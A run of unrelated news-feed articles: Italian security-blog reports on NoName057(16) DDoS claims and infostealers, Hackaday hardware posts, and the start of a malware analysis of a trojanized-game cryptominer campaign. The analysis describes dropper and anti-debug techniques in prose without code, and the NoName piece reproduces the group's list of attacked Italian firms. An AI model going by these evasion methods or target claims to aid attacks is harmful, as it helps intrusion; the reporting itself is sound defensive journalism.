NoName057(16) Cancellato da Telegram! Ma subito il “Reborn” Con Attacchi DDoS All’Italia!
I canali Telegram degli hacker filorussi di NoName057(16) sono stati eliminati da telegram. Ma subito gli attivisti ricreano nuovi canali marchiati con il suffisso “reborn“.
Ma non è tutto, nei loro primi post sui nuovi canali, pubblicano un nuovo attacco ad infrastrutture italiane con attacchi di Distributed Denial-of-Service (DDoS) frutto del progetto DDoSia da loro coordinato.
NoName057(16) è un gruppo di hacker che si è dichiarato a marzo del 2022 a supporto della Federazione Russa. Hanno rivendicato la responsabilità di attacchi informatici a paesi come l’Ucraina, gli Stati Uniti e altri vari paesi europei. Di seguito viene riportato il messaggio presente nel post di oggi sul loro nuovo canale telegram.
Schiacciare l'infrastruttura internet italiana
❌Banca d'investimento italiana Mediobanca Banca di Credito Finanziario SpA (chiuso da geo)
check-host.net/check-report/233b848ck43e
❌Benelli Armi S.p.A. è un'azienda italiana produttrice di armi da fuoco
check-host.net/check-report/233b883fk23
❌Nexi - Società finanziaria italiana
check-host.net/check-report/233b899aka73
❌Fiocchi Munizioni - Il più grande produttore italiano di munizioni (chiuso per motivi geo)
check-host.net/check-report/233b8a88k5e4
❌Franchi - Azienda italiana produttrice di armi da fuoco
check-host.net/check-report/233b8be5k793
❌Danieli - azienda italiana internazionale, fornitrice di attrezzature e impianti per l'industria metallurgica
check-host.net/check-report/233b8d24k48
Che cos’è un attacco Distributed Denial of Service
Un attacco DDoS (Distributed Denial of Service) è un tipo di attacco informatico in cui vengono inviate una grande quantità di richieste a un server o a un sito web da molte macchine diverse contemporaneamente, al fine di sovraccaricare le risorse del server e renderlo inaccessibile ai suoi utenti legittimi.
Queste richieste possono essere inviate da un grande numero di dispositivi infetti da malware e controllati da un’organizzazione criminale, da una rete di computer compromessi chiamata botnet, o da altre fonti di traffico non legittime. L’obiettivo di un attacco DDoS è spesso quello di interrompere le attività online di un’organizzazione o di un’azienda, o di costringerla a pagare un riscatto per ripristinare l’accesso ai propri servizi online.
Gli attacchi DDoS possono causare danni significativi alle attività online di un’organizzazione, inclusi tempi di inattività prolungati, perdita di dati e danni reputazionali. Per proteggersi da questi attacchi, le organizzazioni possono adottare misure di sicurezza come la limitazione del traffico di rete proveniente da fonti sospette, l’utilizzo di servizi di protezione contro gli attacchi DDoS o la progettazione di sistemi resistenti agli attacchi DDoS.
Occorre precisare che gli attacchi di tipo DDoS, seppur provocano un disservizio temporaneo ai sistemi, non hanno impatti sulla Riservatezza e Integrità dei dati, ma solo sulla loro disponibilità. pertanto una volta concluso l’attacco DDoS, il sito riprende a funzionare esattamente come prima.
Che cos’è l’hacktivismo cibernetico
L’hacktivismo cibernetico è un movimento che si serve delle tecniche di hacking informatico per promuovere un messaggio politico o sociale. Gli hacktivisti usano le loro abilità informatiche per svolgere azioni online come l’accesso non autorizzato a siti web o a reti informatiche, la diffusione di informazioni riservate o il blocco dei servizi online di una determinata organizzazione.
L’obiettivo dell’hacktivismo cibernetico è di sensibilizzare l’opinione pubblica su questioni importanti come la libertà di espressione, la privacy, la libertà di accesso all’informazione o la lotta contro la censura online. Gli hacktivisti possono appartenere a gruppi organizzati o agire individualmente, ma in entrambi i casi utilizzano le loro competenze informatiche per creare un impatto sociale e politico.
È importante sottolineare che l’hacktivismo cibernetico non deve essere confuso con il cybercrime, ovvero la pratica di utilizzare le tecniche di hacking per scopi illeciti come il furto di dati personali o finanziari. Mentre il cybercrime è illegale, l’hacktivismo cibernetico può essere considerato legittimo se mira a portare all’attenzione pubblica questioni importanti e a favorire il dibattito democratico. Tuttavia, le azioni degli hacktivisti possono avere conseguenze legali e gli hacktivisti possono essere perseguiti per le loro azioni.
Chi sono gli hacktivisti di NoName057(16)
NoName057(16) è un gruppo di hacker che si è dichiarato a marzo del 2022 a supporto della Federazione Russa. Hanno rivendicato la responsabilità di attacchi informatici a paesi come l’Ucraina, gli Stati Uniti e altri vari paesi europei. Questi attacchi vengono in genere eseguiti su agenzie governative, media e siti Web di società private
Le informazioni sugli attacchi effettuati da NoName057(16) sono pubblicate nell’omonimo canale di messaggistica di Telegram. Secondo i media ucraini, il gruppo è anche coinvolto nell’invio di lettere di minaccia ai giornalisti ucraini. Gli hacker hanno guadagnato la loro popolarità durante una serie di massicci attacchi DDOS sui siti web lituani.
Le tecniche di attacco DDoS utilizzate dal gruppo sono miste, prediligendo la “Slow http attack”.
La tecnica del “Slow Http Attack”
L’attacco “Slow HTTP Attack” (l’articolo completo a questo link) è un tipo di attacco informatico che sfrutta una vulnerabilità dei server web. In questo tipo di attacco, l’attaccante invia molte richieste HTTP incomplete al server bersaglio, con lo scopo di tenere occupate le connessioni al server per un periodo prolungato e impedire l’accesso ai legittimi utenti del sito.
Nello specifico, l’attacco Slow HTTP sfrutta la modalità di funzionamento del protocollo HTTP, che prevede che una richiesta HTTP sia composta da tre parti: la richiesta, la risposta e il corpo del messaggio. L’attaccante invia molte richieste HTTP incomplete, in cui il corpo del messaggio viene inviato in modo molto lento o in modo incompleto, bloccando la connessione e impedendo al server di liberare le risorse necessarie per servire altre richieste.
Questo tipo di attacco è particolarmente difficile da rilevare e mitigare, poiché le richieste sembrano legittime, ma richiedono un tempo eccessivo per essere elaborate dal server. Gli attacchi Slow HTTP possono causare tempi di risposta molto lenti o tempi di inattività del server, rendendo impossibile l’accesso ai servizi online ospitati su quel sistema.
Per proteggersi da questi attacchi, le organizzazioni possono implementare soluzioni di sicurezza come l’uso di firewall applicativi (web application firewall o WAF), la limitazione delle connessioni al server e l’utilizzo di sistemi di rilevamento e mitigazione degli attacchi DDoS
L'articolo NoName057(16) Cancellato da Telegram! Ma subito il “Reborn” Con Attacchi DDoS All’Italia! proviene da il blog della sicurezza informatica.
MIT Demonstrates Fully 3D Printed, Active Electronic Components
One can 3D print with conductive filament, and therefore plausibly create passive components like resistors. But what about active components, which typically require semiconductors? Researchers at MIT demonstrate working concepts for a resettable fuse and logic gates, completely 3D printed and semiconductor-free.
Now just to be absolutely clear — these are still just proofs of concept. To say they are big and perform poorly compared to their semiconductor equivalents would be an understatement. But they do work, and they are 100% 3D printed active electronic components, using commercially-available filament.
How does one make a working resettable fuse and transistor out of such stuff? By harnessing thermal expansion, essentially.
The conductive filament the researchers used is Electrifi by Multi3D, which is PLA combined with copper micro-particles. A segment printed in this filament is normally very conductive due to the densely-packed particles, but as temperature increases (beginning around 40° C) the polymer begins to soften and undergoes thermal expansion. This expansion separates the copper particles, causing a dramatic increase in electrical resistance as electrical pathways are disrupted. That’s pretty neat, but what really ties it together is that this behavior is self-resetting, and reversible. As long as the PLA isn’t straight up melted (that is to say, avoids going over about 150° C) then as the material cools it contracts and restores the conductive pathways to their original low-resistance state. Neat!
So where does the heat required come from? Simply passing enough current through the junction will do the job. By carefully controlling the size and shape of traces (something even hobbyist filament-based 3D printers are very good at) this effect can be made predictable and repeatable.
The transistor is a bit more interesting. By designing two paths so that they intersect each other, one can be used as a control path and the other as a signal path. Applying a voltage to the control path electrically controls the resistance of the signal path, effectively acting as a transistor. Researchers combined these basic transistors into NOT, AND, and OR gates. One is shown here.
This whole system is scalable, low-cost, and highly accessible to just about anyone with some basic equipment. Of course, it has some drawbacks. The switching speed is slow (seconds rather than nanoseconds) and being thermally-driven means power consumption is high. Still, it’s pretty nifty stuff. Check out the research paper for all the nitty-gritty details.
We’ve seen 3D printed triboelectric generators so it’s pretty exciting to now see printed active electronic components. Maybe someday they can be combined?
Infostealer: Quando un clic sbagliato ti fa vendere la Sicurezza Nazionale USA per soli 10 dollari!
Miliardi di dollari, tecnologie avanzate e i più rigidi protocolli di sicurezza: niente di tutto questo ha protetto le strutture militari e le aziende di difesa americane dai più comuni reati informatici.
Lo Studio Hudson Rock mostra che decine di dipendenti di importanti appaltatori della difesa, tra cui Lockheed Martin e Boeing così come il personale dell’esercito e della marina degli Stati Uniti, sono stati infettati dagli infostealer. Credenziali, sessioni VPN, e-mail e persino l’accesso a sistemi di approvvigionamento chiusi sono ora nelle mani dei criminali informatici.
Basta un download accidentale di un file infetto sul tuo computer: un keygenerator di un gioco, un programma hackerato o un documento PDF trojanizzato è sufficente per installare un infostealer. Una volta installato, il malware raccoglie di tutto, dalle password alla cronologia del browser, fino ai file dal computer di lavoro. E poi i dati vengono venduti sul darknet. Il prezzo medio per l’accesso completo al computer di lavoro di un dipendente di un’azienda militare con dati sensibili è di soli 10 dollari.
Questo tipo di attacco si è dimostrato estremamente efficace. Secondo i dati raccolti negli ultimi anni sono stati infettati più di 30 milioni di computer. Di questi, circa il 20% conteneva account aziendali, tra cui quelli di società che collaborano con la sicurezza nazionale degli Stati Uniti.
Particolarmente pericolosi sono i cookie di sessione attivi, che consentono ai criminali di accedere istantaneamente a sistemi protetti senza dover immettere dati di accesso e password. Nemmeno l’autenticazione a più fattori (MFA) sarà utile se un aggressore riesce ad accedere alla sessione attiva di un utente.
L’esempio di Honeywell mostra la portata del problema. Dal 2024, sono stati rubati 56 account aziendali a 398 dipendenti dell’azienda, tra cui l’accesso ai sistemi interni SAP, Bitbucket e SharePoint. Inoltre, sono trapelati gli accessi a servizi di terze parti: Microsoft, Cisco e SAP.
Ma la vera minaccia va ben oltre l’ambito del business privato. Tra le vittime c’erano membri della Marina Militare statunitense il cui accesso ai sistemi Citrix, OWA, Confluence e perfino alle piattaforme di addestramento militare era finito nelle mani degli aggressori. Ciò apre la porta ad attacchi contro installazioni militari critiche. Gli esperti sottolineano che se tali dati dovessero finire nelle mani di paesi ostili, le informazioni ottenute potrebbero essere utilizzate per penetrare in profondità nelle infrastrutture militari.
Le principali misure di protezione includono:
- Divieto di utilizzare dispositivi personali per lavoro: molte infezioni si verificano tramite computer utilizzati sia per attività personali che lavorative;
- Rigorosa politica di download del software: utilizzare solo software con licenza;
- Autenticazione multilivello con monitoraggio continuo della sessione: se i cookie di sessione vengono rubati, devono essere prontamente cancellati;
- Monitorare costantemente le fughe di dati nel darknet: le aziende devono monitorare le fughe di dati dei propri dipendenti.
Hudson Rock ammette che Infostealer non è più solo uno strumento di hacking criminale, ma una minaccia per la sicurezza nazionale. Anche le aziende e le organizzazioni che mantengono rigidi standard di sicurezza informatica diventano vittime a causa delle vulnerabilità dei loro appaltatori e partner. La questione non è se le perdite possano essere prevenute, ma quanto velocemente possano essere individuate e neutralizzate.
L'articolo Infostealer: Quando un clic sbagliato ti fa vendere la Sicurezza Nazionale USA per soli 10 dollari! proviene da il blog della sicurezza informatica.
Belfry OpenSCAD Library (BOSL2) Brings Useful Parts and Tools Aplenty
OpenSCAD has a lot of fans around these parts — if you’re unaware, it’s essentially a code-based way of designing 3D models. Instead of drawing them up in a CAD program, one writes a script that defines the required geometry. All that is made a little easier with the Belfry OpenSCAD Library (BOSL2).
BOSL2 has an extensive library of base shapes, advanced functions for manipulating models, and some really nifty tools for creating attachment points on parts and aligning components with one another. If that sounds handy for designing useful objects, you’re in for even more of a treat when you see their functions for gears, hinges, screws, and more.
There’s even one that covers bottle necks and caps. (Those are all standardized by the way, so it’s never been easier to interface to existing bottles or caps in a project.)
OpenSCAD really is very versatile software. It powers useful tools like this screw, washer, and nut generator as well as having more unusual applications like a procedural terrain generator. It’s free, so if you’ve never looked into it, check it out!
Vacuum Forming With 3D Printed Moulds And Sheets
Vacuum forming is perhaps one of the less popular tools in the modern maker arsenal, something which surprises us a bit because it offers many possibilities. We’ve created our own vacuum forms on 3D printed moulds for ages, so it’s interesting to see [Pisces Printing ] following the same path. But what you might not realize at first is that the vacuum forming sheets themselves are also 3D printed.
The full video is below the break, and in it he details making a mould from PETG, and in particular designing it for easy release. The part he’s making is a belt guard for a table top lathe, and the PETG sheet he’s forming it from is also 3D printed. He makes the point that it’s by no means perfect, for example he shows us a bit of layer separation, but it seems promising enough for further experimentation. His vacuum forming setup seems particularly small, which looks as though it makes the job of making a sheet somewhat simpler.
The cost of a vacuum forming sheet of whichever polymer is hardly high, so we can’t see this technique making sense for everyday use. But as we’ve seen in previous experiments, the printed sheets so make it easy to add color and texture to the final product, which obviously adds some value to the technique.
youtube.com/embed/lTR3ZY2X1Rk?…
Thanks [Tomas Harvie Mudrunka] for the tip.
A Unique Linear Position Sensor Using Magnetostriction
To the extent that you’re familiar with magnetostriction, you probably know that it’s what makes big transformers hum, or that it’s what tips you off if you happen to walk out of a store without paying for something. But magnetostriction has other uses, too, such as in this clever linear position sensor.
Magnetostriction is just the tendency for magnetic materials to change size or shape slightly while undergoing magnetization, thanks to the tiny magnetic domains shifting within the material while they’re aligning. [Florian B.]’s sensor uses a side effect of magnetostriction known as the Wiedenmann effect, which causes a wire to experience a twisting force if a current pulse is applied to it in a magnetic field. When the current pulse is turned off, a mechanical wave travels along the wire to a coil, creating a signal. The difference in time between sending the pulse and receiving the reflection can be used to calculate the position of the magnet along the wire.
To turn that principle into a practical linear sensor, [Florian B.] used nickel wire stretched tightly down the middle of a PVC tube. At one end is a coil of copper magnet wire, while the other end has a damper to prevent reflections. Around the tube is a ring-shaped cursor magnet, which can move up and down the tube. An exciter circuit applies the current pulse to the wire, and an oscilloscope is used to receive the signal from the wire.
This project still appears to be in the prototype phase, as evidenced by the Fischertechnik test rig. [Florian] has been working on the exciter circuit most recently, but he’s done quite a bit of work on optimizing the cursor magnet and the coil configuration, as well as designs for the signal amplifier. It’s a pretty neat project, and we’re looking forward to updates.
If you need a deeper dive into magnetostriction, [Ben Krasnow] points the way.
Auto-Download Your Kindle Books Before February 26th Deadline
With the news that Amazon will no longer be allowing users to download their Kindle books after February 26th, many are scrambling to download their books before it’s too late. The most up-to-date project for automating this process appears to be Amazon Kindle Bulk Downloader.
As the company that famously removed 1984 from thousands of devices without users permission, this is a move that shouldn’t be surprising, but is still disappointing, especially for those of us that were somewhat early adopters of ebooks with Kindles that don’t have a WiFi connection. (Yes, you can tell us about how you bought a Sony reader before the Kindle even came out in the comments.)
The Typescript-coded tool runs inside bun which can be installed in any of the big three OSes and even has a handy Docker image if that’s more your speed. Whether you use this tool or not, if you have any Kindle books we’d implore you to download them now.
Once you’ve downloaded those books, how about cracking the DRM either with LEGO or with software like Calibre. You could load it on a completely Open Source Reader then.
Let There Be Light: The Engineering of Optical HDMI
In a recent video, [Shahriar] from The Signal Path has unveiled the intricate design and architecture of optical HDMI cables, offering a cost-effective solution to extend HDMI 2.0 connections beyond the limitations of traditional copper links. This exploration is particularly captivating for those passionate about innovative hardware hacks and signal transmission technologies.
[Shahriar] begins by dissecting the fundamentals of HDMI high-speed data transmission, focusing on the Transition Minimized Differential Signaling (TMDS) standard. He then transitions to the challenges of converting from twisted-pair copper to optical lanes, emphasizing the pivotal roles of Vertical-Cavity Surface-Emitting Lasers (VCSELs) and PIN photodiodes. These components are essential for transforming electrical signals into optical ones and vice versa, enabling data transmission over greater distances without significant signal degradation.
A standout aspect of this teardown is the detailed examination of the optical modules, highlighting the use of free-space optics and optical confinement techniques with lasers and detectors. [Shahriar] captures the eye diagram of the received high-speed lane and confirms the VCSELs’ optical wavelength at 850 nm. Additionally, he provides a microscopic inspection of the TX and RX chips, revealing the intricate VCSEL and photodetector arrays. His thorough analysis offers invaluable insights into the electronic architecture of optical HDMI cables, shedding light on the complexities of signal integrity and the innovative solutions employed to overcome them.
For enthusiasts eager to take a deeper look into the nuances of optical HDMI technology, [Shahriar]’s comprehensive teardown serves as an excellent resource. It not only gives an insight in the components and design choices involved, but also inspires further exploration into enhancing data transmission methods.
youtube.com/embed/O9QPecpLcnA?…
Hackaday Europe 2025: Speakers, Lightning Talks, and More!
If you’ve been waiting for news from our upcoming Hackaday Europe event in March, wait no longer. We’re excited to announce the first slice of our wonderful speakers lineup! Get your tickets now,
Hackaday Europe is going down again in Berlin this year on March 15th and 16th at MotionLab. It’s Hackaday, but in real life, and it’s too much fun. The badge is off-the-scale cool, powered by the incredible creativity of our community who entered the Supercon SAO contest last fall, and we’re absolutely stoked to be tossing the four winning entries into your schwag bag in Europe.
If you already know you’ll be attending and would like to give a seven-minute Lightning Talk on Sunday, we’re also opening up the call for talks there. Tell us now what you’d like to talk about so we can all hear it on Sunday morning.
We’re looking forward to the talks and to seeing you all there! We’re getting the last few speakers ironed out, have a keynote talk to announce, and, of course, will open up workshop signups. So stay tuned!
Bunnie Huang
Seeing Through Silicon with IRIS Imaging
IRIS (InfraRed, In-Situ) is a technique for imaging silicon chips in CSP-type packages without removing them from the circuit board. In this short talk, I’ll go over the basics of how the technique works, show a couple of ways to implement it, and share some images of chips.
Sera Evcimen
Hardware Startup/Product Pitfalls
This talk is designed to demystify what causes failures and help hardware startups and innovation projects navigate the complex journey of hardware development by identifying and avoiding common pitfalls. With a focus on providing some examples and actionable strategies, it aims to equip teams to overcome challenges and build a strong foundation for success.
Erik Bosman
Creating light sculptures for fun and, … mostly for fun.
This talk will be about solving interesting problems that I created for myself in the process of creating light sculptures:
– Calculating polyhedral shapes
– Turning those into laser-cut pieces, or oddly-shaped PCBs
– Various methods of routing and driving LEDs
– and creating software that takes advantage of the sculptural nature of the light installation.
Niklas Roy
Vectors, Pixels, Plotters and Public Participation
In his talk, Niklas will highlight some of his latest projects that use DIY machines to involve communities in creating art together. From a graffiti robot to a giant mosaic that was designed by an entire neighborhood with the help of a mobile arcade machine, he’ll share the stories behind his inventions. He will discuss his sources of inspiration, the creative process and thoughts about inclusiveness guiding the development of the machines, and the joy of watching diverse people interact with and contribute to these unconventional art pieces.
Daniel Büchele and Andre Zibell
Developing a NFC-based decentralized payment system for a music festival
For a small volunteer-run music festival we designed and built a custom decentralized NFC payment system. Due to the nature of the festival, the design of the system and hardware had some unique requirements: It had to be fully decentralized and not rely on network connection, which created some interesting security challenges. We also developed custom hardware terminals (based on ESP32) to be used at point-of-sale.
Andy Geppert, Anders Nielsen, and Pierre Muth
The Core64 – NeonPixels – 65uino collaboration
Join us to learn how three unique Hackaday projects came together to create something new for 1975, thanks to international collaboration. (Yes, that’s 50 years ago!)
Alun Morris
Half-size Hacking: 0.05″ Matrix Boards Under the Microscope
How do you make a prototype really tiny without designing a PCB? What you need to get started. How do you connect to standard modules with 0.1″ headers? And the world’s smallest multi-channel voltmeter.
Daniel Dakhno
Hacking a pinball machine
This talk explains how we modernized a classic pinball machine by replacing the mechanical guts with a Raspberry Pi, multiple STM32, and a CAN bus, creating infrastructure that can be exploited far beyond the realm of our project.
It Works For Locomotives, Why Not Series Hybrid Semi-Trucks?
Canadian start-up Edison Motors may not seem like much at first glance — consisting of fewer than two dozen people in a large tent — but their idea of bringing series hybrid technology to semi-trucks may just have wheels. The concept and Edison Motors’ progress is explained in a recent video by The Drive on Youtube, starting off with the point that diesel-electric technology is an obvious fit for large trucks like this. After all, it works for trains.
In a series hybrid, there are two motors: a diesel generator and an electric motor (diesel-electric). This was first used in ships in the 1900s and would see increasing use in railway locomotives starting in the early 20th century. In the case of Edison Motors’ current prototype design there is a 9.0 liter Scania diesel engine which is used solely as a generator at a fixed RPM. This is a smaller engine than the ~15 liter engine in a conventional configuration and also doesn’t need a gearbox.
Compared to a battery-electric semi-truck, like the Tesla Semi, it weighs far less. And unlike a hydrogen-fuel cell semi-truck it actually exists and doesn’t require new technologies to be invented. Instead a relatively small battery is kept charged by the diesel generator and power fed back into the battery from regenerative braking. This increases efficiency in many ways, especially in start-stop traffic, while not suffering a weight penalty from a heavy battery pack and being able to use existing service stations, and jerry cans of diesel.
In addition to full semi-trucks Edison Motors also works on conversion kits for existing semi-trucks, pick-up trucks and more. Considering how much of the North American rolling stock on its rail systems is diesel-electric, it’s more amazing that it would have taken so long for the same shift to series hybrid on its road. Even locomotives occasionally used direct-drive diesel, but the benefits of diesel-electric hybrids quickly made that approach obsolete.
youtube.com/embed/dBMguDfirgA?…
Hack On Self: One Minute Blitz
Have you yet stumbled upon the principle of “consistently applied small amounts of work can guarantee completion of large projects”? I have, and it’s worked out well for me – on days when I could pay attention to them, that is.
A couple times, I’ve successfully completed long-term projects by making sure to do only a little bit of it, but I do it every day. It helps a lot with the feeling you get when you approach a large project – say, cleaning up your desk after a few days of heavy-duty hacking. If you’re multi-discipline, and especially if you happen to use multiple desks like me, a desk can stay occupied for a while.
Can you do one minute of desk cleaning today? Sure doesn’t feel like much time, or much effort. In a week’s time, however, you might just have a clean desk. Cleaning discrete messes is where this concept applies pretty well – you couldn’t wash floors like this, but you could wipe off the dust from a few surfaces for sure.
Now, I want to make this a habit – use it on like, seven different things a day. I wrote a script to make it possible – here’s how it works for me right now.
Building Upon The Seen-Before
I relied on a few previously-discussed things for this one. Main one is the Headphone Friend project – a pocketable Linux device, streaming audio from my laptop as I walk around my room. As a reminder, the headphones also have a button that emits HID events when pressed/released, and I have a small piece of software that can map actions to combinations of short-medium-long presses of that button.
Another necessity was a bit of software – dodging my questing system “away from laptop = system breaks” mistake, I wanted to put everything into my headphones, even the task names, trying to reach a “flow” through a series of 1-minute tasks. Of course, I reused the old sound library, but I also needed TTS generation on the fly! I went for PicoTTS with a simple wrapper – it’s not the best TTS system, but it’s damn fast, and perfectly suited for a prototype.
For the button-to-action mapping script, I had to expose some sort of API, to avoid merging the button scanning code and the task switching code. After a little deliberation, I picked websockets – they work decently well, and they’re quite portable, so I could run the button monitoring itself on the Headphone Friend device, and the main software on my laptop, for prototyping purposes.
Now, the more interesting question – how do I build the algorithm?
Can Be More, Can’t Be Less
At the script’s core, I wrote a little state machine describing the “sprints”, and tied my tiny notification-sound-playback library into it. It goes through the five tasks I’ve defined, making a little “beep” after a minute has passed, and waiting for me to press the “next” keypress signaling that I’m done with the task. After five tasks are done, it stops, and waits for the “start” magic keypress sequence – maybe the next sprint is tomorrow, maybe it’s a couple days later, but I get there eventually.
So far, I’ve only had to modify the code a little bit – each task now has a name in the system, but also an actually TTS-pronounceable string, since the picoTTS model does mis-pronounce here and there. Other than that, the very simple prototype works. I’ve tried to upgrade it from picoTTS, compiling piper that can do a good few different voices and languages, but I’ve been firmly stuck on cmake intricacies so far.
Middle-Of-Project Lull
Currently, I’m starting with five tasks – kitchen counter cleaning, hardware desk cleaning, sorting the clothes (in whichever way they need sorting), and cleaning the floors in two rooms. That makes for five minutes minimum, and oftentimes, it’s really just five minutes – to me, feels like it’s important not to get into the flow too much, otherwise the five-minute blitz might become a twenty-minute one, and it gets into “kind a bother to do” mental territory.
The result is, my cooking and hacking surfaces are a little more cleaner and more ready to go on average, and it’s easier to get clothes washing done if there isn’t an unsorted pile to deal with already. I think I most enjoy the movement of it – it’s become a nice way to spend 5-10 minutes moving around the house, breaking the rut. I do need to add some sort of “stop”/”pause” mechanism – sometimes I get too involved in a particular task and could really use a break. My state machine isn’t yet involved enough for this, and maybe soon this might need an overhaul.
At the moment, I’m also looking to tie this into my questing system – I haven’t attached logging to this one yet, but since the questing system includes that, it’d be two-birds-with-one-stone approach. For the questing system, I’m still using the text file backend, which does limit things, but I’ve been meaning to add external action support to it anyway – tying task completion to quest progression is a no-brainer!
Currently, this script and I are in the honeymoon phase: it’s working but I’m waiting for it to fail in more ways, and seeing whether it survives long-term. Based on lessons I’ve been trying to pull from the questing system, I’m trying not to overstretch it – five tasks is enough. For now, it’s pretty nice to be on the island of success in a sea of older solutions that withered away. This time, I’m writing before the full end-conclusion phase, because it’s nice and reassuring when projects work out, and I’d just like to share in that a little bit.
Quanta Energia Consuma Chat-GPT di OpenAI? Lo studio di Epoch AI lo rileva
Il consumo energetico dell’intelligenza artificiale è da tempo oggetto di dibattito. ChatGPT è stato anche oggetto di critiche più di una volta: in precedenza è stato considerato , che ogni richiesta richiede circa 3 wattora di elettricità, ovvero 10 volte il costo di una richiesta a Google. Tuttavia la nuova ricerca di Epoch AI ha smentito questa cifra.
Secondo Epoch AI, la query ChatGPT media che utilizza il modello GPT-4o consuma solo circa 0,3 wattora. Ciò significa che una domanda rivolta all’IA richiede meno elettricità rispetto alla maggior parte degli elettrodomestici domestici. Ad esempio, una lampadina LED da 10 W consuma la stessa quantità di energia in 6 minuti di funzionamento.
La differenza nelle stime è dovuta a dati obsoleti. Studi precedenti si sono basati sul presupposto che vengano utilizzati processori server meno efficienti. Tuttavia, negli ultimi anni l’infrastruttura informatica è notevolmente migliorata: i nuovi modelli funzionano con chip più efficienti dal punto di vista energetico e gli algoritmi sono diventati meno costosi. Di conseguenza, il carico sulla rete elettrica si è rivelato molto inferiore a quanto si pensasse in precedenza.
Resta tuttavia aperta la questione del consumo energetico dell’intelligenza artificiale in futuro. Nonostante i guadagni in termini di efficienza, OpenAI e altre aziende continuano ad aumentare la loro potenza di calcolo. Secondo il rapporto di Rand, nei prossimi due anni i data center potrebbero consumare quasi tutta la capacità della rete elettrica della California del 2022 (68 GW). Entro il 2030, l’addestramento di un modello avanzato di intelligenza artificiale potrebbe consumare fino a 8 GW, l’equivalente del funzionamento di otto reattori nucleari.
Un ulteriore onere è creato dalle nuove architetture di intelligenza artificiale, in particolare dai cosiddetti modelli di ragionamento. A differenza di GPT-4o, che risponde quasi istantaneamente, tali sistemi impiegano secondi o addirittura minuti a “pensare” prima di produrre un risultato. Ciò li rende più potenti, ma aumenta anche il consumo di energia. OpenAI ha già iniziato a rilasciare versioni più efficienti dal punto di vista energetico di tali modelli, come l’o3-mini, ma gli esperti dubitano che i miglioramenti in termini di efficienza compenseranno la crescente domanda.
La questione del consumo energetico sta diventando non solo una questione tecnologica, ma anche politica. La scorsa settimana, più di 100 organizzazioni ha firmato una lettera aperta invitando gli enti regolatori a supervisionare la costruzione di nuovi data center. Si sottolinea che la crescita della potenza di calcolo potrebbe portare a una carenza di risorse energetiche e a un aumento della quota di combustibili fossili nel bilancio energetico.
Per ora, l’unico modo per ridurre il carico sulla rete elettrica è attraverso l’uso intelligente della tecnologia. Epoch AI consiglia agli utenti che desiderano ridurre al minimo la propria “impronta di carbonio digitale” di scegliere versioni dei modelli che richiedono meno risorse. Tuttavia, data la crescente popolarità dell’intelligenza artificiale, questa opzione è più temporanea che a lungo termine.
L'articolo Quanta Energia Consuma Chat-GPT di OpenAI? Lo studio di Epoch AI lo rileva proviene da il blog della sicurezza informatica.
Give Your Animal Crossing Villagers the Gift of Linux
If you’ve played any of the versions of Nintendo’s Animal Crossing over the years, you’ll know that eventually you get to the point where you’ve maxed out your virtual house and filled it with all the furniture you could possibly want — which is arguably as close to “winning” the game as you can get.
But now thanks to the work of [decrazyo] there’s a piece of furniture that you can add to your Animal Crossing house that will never get old: an x86 emulator that boots Linux. As explained in the video below, this trick leverages the fact that Nintendo had already built a highly accurate Nintendo Entertainment System (NES) emulator into Animal Crossing on the GameCube, which could be used to run a handful of classic games from within the player’s virtual living room. But it turns out that you can get that emulator to load a user-provided ROM from the GameCube’s memory card, which opens the doors to all sorts of mischief.
If porting Linux to the NES sounded tough, running an x86 emulator on the console must be pure madness. But in reality, it’s not far off from several projects we’ve seen in the past. If you can boot Linux on an ATmega328 via an emulated RISC-V processor, why not x86 on the NES? In both cases, the only problem is performance: the emulated system ends up running at only a tiny fraction of real-speed, meaning booting a full OS could take hours.
As if things couldn’t get complicated enough, when [decrazyo] tried to boot the x86 emulator ROM, Animal Crossing choked. It turned out (perhaps unsurprisingly) that his ROM was using some features the emulator didn’t support, and was using twice as much RAM as normal. Some re-writes to the emulator sorted out the unsupported features, but there was no getting around the RAM limitation. Ultimately, [decrazyo] had to create a patch for Animal Crossing that doubled the memory of the in-game emulator.
Still with us? So the final setup is a patched Animal Crossing, which is running an in-game NES emulator, which is running a ROM that contains an x86 emulator, which is finally booting a minimal Linux environment at something like 1/64th normal speed. Are we having fun yet?
Despite its age and cutesy appearance, the original Animal Crossing has turned out to be a surprisingly fertile playground for hackers.
youtube.com/embed/OooHTDMUSGY?…
StaryDobry ruins New Year’s Eve, delivering miner instead of presents
Introduction
On December 31, cybercriminals launched a mass infection campaign, aiming to exploit reduced vigilance and increased torrent traffic during the holiday season. Our telemetry detected the attack, which lasted for a month and affected individuals and businesses by distributing the XMRig cryptominer. This previously unidentified actor is targeting users worldwide—including in Russia, Brazil, Germany, Belarus and Kazakhstan—by spreading trojanized versions of popular games via torrent sites.
In this report, we analyze how the attacker evades detection and launches a sophisticated execution chain, employing a wide range of defense evasion techniques.
Kaspersky’s products detect this threat as
Trojan.Win64.StaryDobry.*, Trojan-Dropper.Win64.StaryDobry.*, HEUR:Trojan.Win64.StaryDobry.gen.
Initial infection
On December 31, while reviewing our telemetry, we first detected this massive infection. Further investigation revealed that the campaign was initially distributed via popular torrent trackers. Trojanized versions of popular games—such as BeamNG.drive, Garry’s Mod, Dyson Sphere Program, Universe Sandbox, and Plutocracy—were designed to launch a sophisticated infection chain, ultimately deploying a miner implant. These malicious releases were created in advance and uploaded around September 2024.
Infection timeline
Although the malicious releases were published by different authors, they were all cracked the same way.
Malicious torrent available for download
Among the compromised installers are popular simulator and sandbox games that require minimal disk space. Below is the distribution of affected users by game as of January 2025:
Infected users per game (download)
These releases, often referred to as “repacks”, were usually distributed in an archive. Let’s now take a closer look at one of the samples. Upon unpacking the archive, we found a trojanized installer.
Technical details
Trojanized installer
After launching the installer (a Windows 32-bit GUI executable), we were welcomed with a GUI screen showing three options: install the game, choose the language, or quit.
Installer screen
This installer was created with Inno Setup. After decompiling the installer, we examined its code and found an interesting functionality.
Decompiled installer code
This code is responsible for extracting the malicious files used in this attack. First, it decrypts unrar.dll using the DECR function, which is a proxy for the RARExtract function within the rar.dll library. RARExtract decrypts unrar.dll using AES encryption with a hard-coded key,
cls-precompx.dll. Next, additional files from the archive are dropped into the temporary directory, and execution proceeds to the RARGetDllVersion function within unrar.dll.
Unrar.dll dropper
First of all, the sample runs a series of methods to check if it’s being launched in a debugging environment. These methods search for debugger and sandbox modules injected into processes, and also check the registry and filesystem for certain popular software. If such software is detected, execution immediately terminates.
Anti-debug checks example
